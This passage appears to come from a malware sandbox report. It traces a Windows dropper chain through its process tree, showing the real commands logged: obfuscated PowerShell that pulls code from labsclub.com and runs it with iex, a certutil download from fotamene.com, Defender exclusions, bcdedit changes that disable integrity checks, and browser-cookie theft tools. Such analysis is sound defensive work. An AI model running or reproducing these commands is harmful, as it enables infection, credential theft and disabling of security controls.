        C:\Users\Admin\AppData\Local\Temp\is-36FN0.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-36FN0.tmp\Setup.exe" /VERYSILENT
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3132
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-36FN0.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3168
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Setup.exe /f
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4048
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:2816
    - - C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\PictureLAb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\PictureLAb.exe" /Verysilent
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1604
      - C:\Users\Admin\AppData\Local\Temp\is-ISIJ7.tmp\PictureLAb.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-ISIJ7.tmp\PictureLAb.tmp" /SL5="$2025C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\PictureLAb.exe" /Verysilent
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\is-DTR21.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-DTR21.tmp\Setup.exe" /VERYSILENT
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2696
        
        C:\Users\Admin\AppData\Local\Temp\is-IKPJF.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IKPJF.tmp\Setup.tmp" /SL5="$8006C,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-DTR21.tmp\Setup.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\is-EHU2F.tmp\HGT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-EHU2F.tmp\HGT.exe" /S /UID=lab214
        9⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2056
        
        C:\Program Files\Java\OGMENEMCZI\prolab.exe
        
        "C:\Program Files\Java\OGMENEMCZI\prolab.exe" /VERYSILENT
        10⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\is-0PL7O.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0PL7O.tmp\prolab.tmp" /SL5="$A003A,575243,216576,C:\Program Files\Java\OGMENEMCZI\prolab.exe" /VERYSILENT
        11⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:732
        
        C:\Users\Admin\AppData\Local\Temp\cc-f0b9c-db4-32e9f-3f9b438b3f1ab\ZHipigapybu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cc-f0b9c-db4-32e9f-3f9b438b3f1ab\ZHipigapybu.exe"
        10⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1780
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mrjlrkfi.hhd\gaooo.exe & exit
        11⤵
        Suspicious use of WriteProcessMemory
        
        PID:13660
        
        C:\Users\Admin\AppData\Local\Temp\mrjlrkfi.hhd\gaooo.exe
        
        C:\Users\Admin\AppData\Local\Temp\mrjlrkfi.hhd\gaooo.exe
        12⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:15624
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        Executes dropped EXE
        
        PID:16316
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        Executes dropped EXE
        
        PID:7320
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\04gvesug.cpj\md7_7dfj.exe & exit
        11⤵
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\04gvesug.cpj\md7_7dfj.exe
        
        C:\Users\Admin\AppData\Local\Temp\04gvesug.cpj\md7_7dfj.exe
        12⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of AdjustPrivilegeToken
        
        PID:5196
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ej13il0b.uwn\askinstall29.exe & exit
        11⤵
        
        PID:8448
        
        C:\Users\Admin\AppData\Local\Temp\ej13il0b.uwn\askinstall29.exe
        
        C:\Users\Admin\AppData\Local\Temp\ej13il0b.uwn\askinstall29.exe
        12⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:8568
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        13⤵
        
        PID:10292
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        14⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:10588
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2ewbz5pa.ga2\customer4.exe & exit
        11⤵
        
        PID:14836
        
        C:\Users\Admin\AppData\Local\Temp\2ewbz5pa.ga2\customer4.exe
        
        C:\Users\Admin\AppData\Local\Temp\2ewbz5pa.ga2\customer4.exe
        12⤵
        Executes dropped EXE
        
        PID:14948
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
        13⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:15180
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
        
        parse.exe -f json -b firefox
        14⤵
        
        PID:18340
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
        
        parse.exe -f json -b edge
        14⤵
        
        PID:18380
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
        
        parse.exe -f json -b chrome
        14⤵
        
        PID:18352
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rsa4jsib.che\HookSetp.exe & exit
        11⤵
        
        PID:15408
        
        C:\Users\Admin\AppData\Local\Temp\rsa4jsib.che\HookSetp.exe
        
        C:\Users\Admin\AppData\Local\Temp\rsa4jsib.che\HookSetp.exe
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1052
        
        C:\ProgramData\4784775.52
        
        "C:\ProgramData\4784775.52"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:16120
        
        C:\ProgramData\6727327.73
        
        "C:\ProgramData\6727327.73"
        13⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:16180
        
        C:\ProgramData\Windows Host\Windows Host.exe
        
        "C:\ProgramData\Windows Host\Windows Host.exe"
        14⤵
        Executes dropped EXE
        
        PID:16420
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a5xh0pwe.ghz\GcleanerWW.exe /mixone & exit
        11⤵
        
        PID:15720
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\42tpofvp.fjt\privacytools5.exe & exit
        11⤵
        
        PID:15888
        
        C:\Users\Admin\AppData\Local\Temp\42tpofvp.fjt\privacytools5.exe
        
        C:\Users\Admin\AppData\Local\Temp\42tpofvp.fjt\privacytools5.exe
        12⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:15960
        
        C:\Users\Admin\AppData\Local\Temp\42tpofvp.fjt\privacytools5.exe
        
        C:\Users\Admin\AppData\Local\Temp\42tpofvp.fjt\privacytools5.exe
        13⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        
        PID:16340
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zommfzuf.pfu\setup.exe /8-2222 & exit
        11⤵
        
        PID:16820
        
        C:\Users\Admin\AppData\Local\Temp\zommfzuf.pfu\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\zommfzuf.pfu\setup.exe /8-2222
        12⤵
        Executes dropped EXE
        
        PID:16888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Fragrant-Thunder"
        13⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:16952
        
        C:\Program Files (x86)\Fragrant-Thunder\7za.exe
        
        "C:\Program Files (x86)\Fragrant-Thunder\7za.exe" e -p154.61.71.51 winamp-plugins.7z
        13⤵
        
        PID:4248
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Fragrant-Thunder\setup.exe" -map "C:\Program Files (x86)\Fragrant-Thunder\WinmonProcessMonitor.sys""
        13⤵
        
        PID:5652
        
        C:\Program Files (x86)\Fragrant-Thunder\setup.exe
        
        "C:\Program Files (x86)\Fragrant-Thunder\setup.exe" -map "C:\Program Files (x86)\Fragrant-Thunder\WinmonProcessMonitor.sys"
        14⤵
        
        PID:5796
        
        C:\Program Files (x86)\Fragrant-Thunder\7za.exe
        
        "C:\Program Files (x86)\Fragrant-Thunder\7za.exe" e -p154.61.71.51 winamp.7z
        13⤵
        
        PID:6216
        
        C:\Program Files (x86)\Fragrant-Thunder\setup.exe
        
        "C:\Program Files (x86)\Fragrant-Thunder\setup.exe" /8-2222
        13⤵
        
        PID:6584
        
        C:\Program Files (x86)\Fragrant-Thunder\setup.exe
        
        "C:\Program Files (x86)\Fragrant-Thunder\setup.exe" /8-2222
        14⤵
        
        PID:9920
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        15⤵
        
        PID:11192
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        16⤵
        
        PID:11252
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe /8-2222
        15⤵
        
        PID:11576
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        16⤵
        Creates scheduled task(s)
        
        PID:2336
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        16⤵
        Creates scheduled task(s)
        
        PID:12652
        
        C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        16⤵
        
        PID:13000
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        17⤵
        Modifies boot configuration data using bcdedit
        
        PID:14724
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        17⤵
        Modifies boot configuration data using bcdedit
        
        PID:14592
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        17⤵
        Modifies boot configuration data using bcdedit
        
        PID:14912
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        17⤵
        Modifies boot configuration data using bcdedit
        
        PID:15020
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        17⤵
        Modifies boot configuration data using bcdedit
        
        PID:8596
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        17⤵
        Modifies boot configuration data using bcdedit
        
        PID:15076
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        17⤵
        Modifies boot configuration data using bcdedit
        
        PID:15216
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        17⤵
        Modifies boot configuration data using bcdedit
        
        PID:736
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        17⤵
        Modifies boot configuration data using bcdedit
        
        PID:15348
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        17⤵
        Modifies boot configuration data using bcdedit
        
        PID:15392
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        17⤵
        Modifies boot configuration data using bcdedit
        
        PID:15504
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        17⤵
        Modifies boot configuration data using bcdedit
        
        PID:15608
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        17⤵
        Modifies boot configuration data using bcdedit
        
        PID:15684
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
        17⤵
        Modifies boot configuration data using bcdedit
        
        PID:15740
        
        C:\Windows\System32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        16⤵
        Modifies boot configuration data using bcdedit
        
        PID:15852
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        16⤵
        
        PID:16680
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        16⤵
        
        PID:10020
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        17⤵
        
        PID:8708
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        18⤵
        
        PID:10420
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h3tlfwkc.pd0\MultitimerFour.exe & exit
        11⤵
        
        PID:16940
        
        C:\Users\Admin\AppData\Local\Temp\h3tlfwkc.pd0\MultitimerFour.exe
        
        C:\Users\Admin\AppData\Local\Temp\h3tlfwkc.pd0\MultitimerFour.exe
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:17068
        
        C:\Users\Admin\AppData\Local\Temp\QYO07UJRN6\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QYO07UJRN6\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        13⤵
        Executes dropped EXE
        
        PID:17304
        
        C:\Users\Admin\AppData\Local\Temp\QYO07UJRN6\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QYO07UJRN6\multitimer.exe" 1 3.1616085473.605381e147101 104
        14⤵
        
        PID:18148
        
        C:\Users\Admin\AppData\Local\Temp\QYO07UJRN6\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QYO07UJRN6\multitimer.exe" 2 3.1616085473.605381e147101
        15⤵
        
        PID:18284
        
        C:\Users\Admin\AppData\Local\Temp\1o0idmr54rx\l0isa2pqgkx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1o0idmr54rx\l0isa2pqgkx.exe" /VERYSILENT
        16⤵
        
        PID:4524
        
        C:\Users\Admin\AppData\Local\Temp\is-IAMQS.tmp\l0isa2pqgkx.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IAMQS.tmp\l0isa2pqgkx.tmp" /SL5="$5014A,870426,780800,C:\Users\Admin\AppData\Local\Temp\1o0idmr54rx\l0isa2pqgkx.exe" /VERYSILENT
        17⤵
        
        PID:4688
        
        C:\Users\Admin\AppData\Local\Temp\is-L23EQ.tmp\winlthst.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-L23EQ.tmp\winlthst.exe" test1 test1
        18⤵
        
        PID:5160
        
        C:\Users\Admin\AppData\Local\Temp\AiTcbAlcQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AiTcbAlcQ.exe"
        19⤵
        
        PID:6888
        
        C:\Users\Admin\AppData\Local\Temp\AiTcbAlcQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AiTcbAlcQ.exe"
        20⤵
        
        PID:7256
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        19⤵
        
        PID:17208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        20⤵
        
        PID:17320
        
        C:\Users\Admin\AppData\Local\Temp\pg55w5sry0c\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pg55w5sry0c\vict.exe" /VERYSILENT /id=535
        16⤵
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\is-JB1F3.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JB1F3.tmp\vict.tmp" /SL5="$401EE,870426,780800,C:\Users\Admin\AppData\Local\Temp\pg55w5sry0c\vict.exe" /VERYSILENT /id=535
        17⤵
        
        PID:4820
        
        C:\Users\Admin\AppData\Local\Temp\is-7F09D.tmp\wimapi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-7F09D.tmp\wimapi.exe" 535
        18⤵
        
        PID:5168
        
        C:\Users\Admin\AppData\Local\Temp\MqJQqhagK.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MqJQqhagK.exe"
        19⤵
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\Temp\MqJQqhagK.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MqJQqhagK.exe"
        20⤵
        
        PID:7288
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        19⤵
        
        PID:17228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        20⤵
        
        PID:17372
        
        C:\Users\Admin\AppData\Local\Temp\ltdn0535g4g\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ltdn0535g4g\askinstall24.exe"
        16⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        17⤵
        
        PID:5056
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        18⤵
        Kills process with taskkill
        
        PID:5472
        
        C:\Users\Admin\AppData\Local\Temp\m1zbmqkevdl\db14y2wcsj4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\m1zbmqkevdl\db14y2wcsj4.exe" /ustwo INSTALL
        16⤵
        
        PID:4592
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 648
        17⤵
        Program crash
        
        PID:6740
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 660
        17⤵
        Program crash
        
        PID:6816
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 764
        17⤵
        Program crash
        
        PID:6900
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 800
        17⤵
        Program crash
        
        PID:7108
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 880
        17⤵
        Program crash
        
        PID:7216
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 928
        17⤵
        Program crash
        
        PID:7972
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1084
        17⤵
        Program crash
        
        PID:8076
        
        C:\Users\Admin\AppData\Local\Temp\btkd1iwmgao\AwesomePoolU1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\btkd1iwmgao\AwesomePoolU1.exe"
        16⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\e2rshz2rsph\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e2rshz2rsph\vpn.exe" /silent /subid=482
        16⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\Temp\is-9V5FH.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9V5FH.tmp\vpn.tmp" /SL5="$20370,15170975,270336,C:\Users\Admin\AppData\Local\Temp\e2rshz2rsph\vpn.exe" /silent /subid=482
        17⤵
        
        PID:4832
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        18⤵
        
        PID:5992
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        19⤵
        
        PID:6104
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        18⤵
        
        PID:6940
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        19⤵
        
        PID:7496
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        18⤵
        
        PID:9056
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        18⤵
        
        PID:9988
        
        C:\Users\Admin\AppData\Local\Temp\2upvxsnyzss\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2upvxsnyzss\Setup3310.exe" /Verysilent /subid=577
        16⤵
        
        PID:4584
        
        C:\Users\Admin\AppData\Local\Temp\pxxy5yimbki\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pxxy5yimbki\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        16⤵
        
        PID:5100
        
        C:\Users\Admin\AppData\Local\Temp\is-H0HBE.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-H0HBE.tmp\IBInstaller_97039.tmp" /SL5="$104BC,14597143,721408,C:\Users\Admin\AppData\Local\Temp\pxxy5yimbki\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        17⤵
        
        PID:4980
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://janiboots.store/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
        18⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Local\Temp\is-BBES6.tmp\{app}\chrome_proxy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-BBES6.tmp\{app}\chrome_proxy.exe"
        18⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-BBES6.tmp\{app}\chrome_proxy.exe"
        19⤵
        
        PID:8988
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 4
        20⤵
        Runs ping.exe
        
        PID:9124
        
        C:\Users\Admin\AppData\Local\Temp\0822L6JGME\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0822L6JGME\setups.exe" ll
        13⤵
        
        PID:17332
        
        C:\Users\Admin\AppData\Local\Temp\is-MJ9E7.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-MJ9E7.tmp\setups.tmp" /SL5="$402AA,549376,61440,C:\Users\Admin\AppData\Local\Temp\0822L6JGME\setups.exe" ll
        14⤵
        
        PID:17376
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jmjmtrox.ohj\setup.exe /S /kr /site_id=754 & exit
        11⤵
        
        PID:17392
        
        C:\Users\Admin\AppData\Local\Temp\jmjmtrox.ohj\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\jmjmtrox.ohj\setup.exe /S /kr /site_id=754
        12⤵
        
        PID:17668
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        13⤵
        
        PID:18100
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        14⤵
        
        PID:18176
        
        \??\c:\windows\SysWOW64\reg.exe
        
